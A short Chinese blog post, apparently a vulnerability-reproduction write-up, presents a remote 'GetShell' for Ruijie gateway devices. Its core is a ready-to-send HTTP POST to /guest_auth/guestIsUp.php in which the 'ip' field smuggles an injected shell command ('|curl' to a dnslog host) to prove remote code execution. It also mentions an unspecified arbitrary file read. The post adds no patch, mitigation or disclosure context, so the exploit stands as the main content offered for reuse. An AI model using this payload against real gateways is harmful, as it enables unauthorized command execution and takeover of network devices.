锐捷网关系列通杀GetShell

作者: print("") 分类: WEB安全,信息安全,漏洞复现 发布时间: 2021-01-11 23:30

https://github.com/Tas9er/EgGateWayGetShell

使用jd-gui 解开

整理出POC 如下:

POST /guest_auth/guestIsUp.php HTTP/1.1
Host: 192.168.10.1
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 56


mac=1&ip=127.0.0.1|curl xxx.dnslog.cn

看看源代码

看了一下其他的代码。发现一个任意文件读取

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论

电子邮件地址不会被公开。 必填项已用*标注